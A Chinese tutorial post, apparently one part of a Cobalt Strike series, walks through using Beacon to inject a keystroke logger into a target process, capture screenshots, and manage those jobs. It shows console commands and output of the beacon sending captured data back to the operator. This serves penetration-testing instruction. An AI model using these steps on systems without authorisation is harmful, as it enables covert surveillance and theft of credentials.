Cobalt Strike教程-第九节 Beacon 键盘记录,屏幕截图

释放双眼,带上耳机,听听看~!

Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。

Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。

Cobalt Strike是一款常用于后渗透的神器,这个工具以团队作为主体,共享信息,拥有多种协议上线方式,集成了端口转发,端口扫描,socket代理,提权,钓鱼等。除去自身功能外,Cobalt Strike还利用了Metasploit和Mimikatz等其他知名工具的功能。

0x00 Beacon 键盘记录

Beacon提供的键盘记录个人感觉还是比较强大

beacon> help keylogger
Use: keylogger [pid] <x86|x64>
     keylogger

Inject a keystroke logger into the specified process. Use jobkill to terminate
this task early.

Use keylogger with no arguments to spawn a temporary process and inject the 
keystroke logger into it.

可以看到简介 可以使用2种方式 一种是进程注入 一种是直接使用 到这里我顺便介绍一些命令吧 ps 显示目标进程 Cobalt Strike  然后我们选择一个进程来注入

beacon> keylogger 2460
[*] Tasked beacon to log keystrokes in 2460 (x86)
[+] host called home, sent: 65610 bytes
[+] received keystrokes

我们在 View>Keystrokes 可以看到 效果 Cobalt Strike

不得不说Cobalt Strike还是比较人性化,他给我们提供了很方便的操作,能多选目标 然后右键 获取进程注入键盘记录,屏幕截屏等。

Cobalt Strike

这里需要注意一下你的注入User是你想记录的用户进程

0x01 Screenshost

beacon> screenshot 1344 x86 90
[*] Tasked beacon to take screenshots in 1344/x86 for next 90 seconds
[+] host called home, sent: 162832 bytes
[+] host called home, sent: 58 bytes
[*] received screenshot (116332 bytes)
[*] received screenshot (112961 bytes)

同样 也是可以使用批量的 Cobalt Strike  操作跟键盘记录一样,但是选择后他会选择一个记录多长时间,自己按需求选择

我们在 View>Screenshost 可以看到 效果 Cobalt Strike

在我们不需要这些进程的时候 可以 在beacon里面运行 jobs 查看任务进程在用jobkill JID来结束进程

beacon> keylogger 1344 x86
[*] Tasked beacon to log keystrokes in 1344 (x86)
[+] host called home, sent: 65610 bytes
beacon> jobs
[*] Tasked beacon to list jobs
[+] host called home, sent: 8 bytes
[*] Jobs

 JID  PID   Description
 ---  ---   -----------
 5    1344  keystroke logger

beacon> jobkill 5
[*] Tasked beacon to kill job 5
[+] host called home, sent: 10 bytes

0x02 文末

貌似Cobalt Strike 截图的时候目标系统会有明显的卡顿,还有个远控功能还是建议大家别用不是很好(用时半小时)

本文如有错误,请及时提醒,以免误导他人

@404
aleenzz
公众号:aleenzz

人已赞赏
安全工具

Cobalt Strike教程-第八节 钓鱼 Office

2019-11-11 14:25:49

安全工具

Cobalt Strike教程-第十节 Beacon socks代理与端口

2019-11-11 14:30:34

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索